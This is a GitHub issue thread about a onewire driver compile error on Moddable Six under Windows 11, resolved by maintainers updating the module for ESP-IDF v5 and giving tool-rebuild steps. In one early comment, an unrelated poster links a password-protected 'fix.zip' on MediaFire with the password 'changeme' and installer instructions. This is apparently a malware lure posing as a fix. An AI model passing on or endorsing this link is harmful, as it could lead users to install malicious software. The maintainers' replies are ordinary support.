Moddable-OpenSource/moddable #1395: Onewire driver in Moddable Six

mauroForlimpopoli, 2024-08-28:
I'm running example https://github.com/Moddable-OpenSource/moddable/tree/public/examples/drivers/onewire on Moddable Six
this is the error during compilation

```
# cc modonewire.c.o
In file included from C:\Users\mades\Projects\moddable\modules\drivers\onewire\esp\modonewire.c:34:
C:\Users\mades\Projects\moddable\modules\drivers\onewire\esp\owb_rmt.h:34:10: fatal error: driver/rmt.h: No such file or directory
   34 | #include "driver/rmt.h"
      |          ^~~~~~~~~~~~~~
compilation terminated.
```
I'm using windows 11

scheichreisuli, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

phoddie, 2024-08-31:
We'll take a look.

mkellner, 2024-09-13:
The onewire module has been updated to work with IDF v5+
It will be available in the next release.

mauroForlimpopoli, 2024-09-13:
Thank you Michael.
Can you tell me when it will be released.
I need urgently
Regards

mkellner, 2024-09-13:
@mauroForlimpopoli, it is available now.

mauroForlimpopoli, 2024-09-16:
Hi Michael,
I updated the Moddable SDK with
```
cd %MODDABLE%
git stash push
git pull
git stash pop
```
Then I updated the ESP-IDF to 5.3 but now I have this error from the compiler
```
C:\Users\mades\projects\moddable\examples\piu\six>mcconfig -d -m -p esp32/moddable_six_cdc
INFORMAZIONI: impossibile trovare file corrispondenti ai
criteri di ricerca indicati.
Setting PYTHONNOUSERSITE, was not set
Using Python in C:\Users\mades\esp32\esp-idf\
"null" non è riconosciuto come comando interno o esterno,
 un programma eseguibile o un file batch.
Using Git in C:\Espressif\tools\idf-git\2.44.0\cmd\
git version 2.44.0.windows.1
Checking Python compatibility
Setting IDF_PATH: C:\Users\mades\esp32\esp-idf

Adding ESP-IDF tools to PATH...
Not using an unsupported version of tool cmake found in PATH: 3.27.2.
Not using an unsupported version of tool ninja found in PATH: 1.11.0.
    C:\Espressif\tools\xtensa-esp-elf-gdb\14.2_20240403\xtensa-esp-elf-gdb\bin
    C:\Espressif\tools\riscv32-esp-elf-gdb\14.2_20240403\riscv32-esp-elf-gdb\bin
    C:\Espressif\tools\xtensa-esp-elf\esp-13.2.0_20240530\xtensa-esp-elf\bin
    C:\Espressif\tools\riscv32-esp-elf\esp-13.2.0_20240530\riscv32-esp-elf\bin
    C:\Espressif\tools\esp32ulp-elf\2.38_20240113\esp32ulp-elf\bin
    C:\Espressif\tools\cmake\3.24.0\bin
    C:\Espressif\tools\openocd-esp32\v0.12.0-esp32-20240318\openocd-esp32\bin
    C:\Espressif\tools\ninja\1.11.1\
    C:\Espressif\tools\idf-exe\1.0.3\
    C:\Espressif\tools\ccache\4.8\ccache-4.8-windows-x86_64
    C:\Espressif\tools\dfu-util\0.11\dfu-util-0.11-win64
    C:\Espressif\python_env\idf5.3_py3.12_env\Scripts
    C:\Users\mades\esp32\esp-idf\tools

Checking if Python packages are up to date...
Constraint file: C:\Espressif\espidf.constraints.v5.3.txt
Requirement files:
 - C:\Users\mades\esp32\esp-idf\tools\requirements\requirements.core.txt
Python being checked: C:\Espressif\python_env\idf5.3_py3.12_env\Scripts\python.exe
Python requirements are satisfied.

Done! You can now compile ESP-IDF projects.
Go to the project directory and run:

  idf.py build

Using recommended ESP-IDF v5.3
# bles2gatt bleservices
        1 file copiati.
        1 file copiati.
        1 file copiati.
NMAKE : fatal error U1073: impossibile creare 'C:\Users\mades\Projects\moddable\build\tmp\esp32\moddable_six_cdc\debug\six\xsProj-esp32s3\..\xs_idf_deps.txt'
Stop.

C:\Users\mades\projects\moddable\examples\piu\six>
C:\Users\mades\projects\moddable\examples\piu\six>
``` 
What can I do ?
regards

mkellner, 2024-09-16:
Please try `mcconfig -d -m -p esp32/moddable_six_cdc` a second time.

I will try to reproduce on my Windows machine.

mkellner, 2024-09-16:
My apologies for not being complete.

After updating the source code, you will need to rebuild the tools as there were some changes to support the new `dependency` property that is required for the `onewire` module.

```
cd %MODDABLE%\build
rd /s/q tmp bin
cd makefiles\win
build
```

Then build the app:

```
cd %MODDABLE%\examples\drivers\onewire
mcconfig -d -m -p esp32/moddable_six_cdc
```

mauroForlimpopoli, 2024-09-18:
Dear Michael, 
after the rebuild the compiler goes correctly. In the example test it works,
but I can't test the onewire driver in my project now because the change of IDF make me do some corrections to the previus code and so I will test it in next days. 
I hope so ....
Thank you very much

mkellner, 2024-09-18:
I am glad to hear the onewire test is working for you. Good luck with your project.

closed 2024-09-18 by phoddie